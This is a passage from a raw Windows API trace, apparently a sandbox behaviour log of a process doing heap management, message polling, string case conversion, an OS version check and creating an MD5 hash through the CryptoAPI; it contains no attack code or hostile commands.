(HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0099.776] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0099.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0099.776] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0099.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0099.776] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.777] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0099.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0099.777] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.778] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.778] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.778] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0099.778] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0099.778] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0099.778] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0099.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0099.778] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0099.779] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0099.779] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0099.779] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0099.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0099.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0099.780] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0099.780] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0099.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0099.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0099.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684c8 | out: hHeap=0x2af0000) returned 1 [0099.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0099.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0099.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0099.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0099.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0099.780] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.780] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0099.780] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0099.780] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0099.780] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0099.780] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0099.782] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0099.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0099.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7020, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0099.785] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bebc0) returned 1 [0099.826] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.826] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.826] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0099.826] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0099.826] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0099.826] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0099.826] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0099.826] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0099.826] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.826] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.826] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.826] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0099.827] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0099.827] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0099.827] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0099.827] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0099.827] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0099.827] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0099.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.828] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.828] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0099.828] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0099.828] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.829] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0099.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.829] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.829] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0099.829] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0099.829] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0099.829] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0099.829] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0099.829] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0099.829] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0099.829] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0099.829] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0099.829] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0099.829] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0099.829] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0099.829] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0099.829] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0099.829] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0099.830] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0099.830] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0099.830] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0099.830] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0099.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.830] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.830] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0099.830] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.830] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0099.830] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.830] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.830] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0099.830] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.830] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0099.830] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.830] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.830] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9d90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0099.830] CryptCreateHash (in: hProv=0x9bebc0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 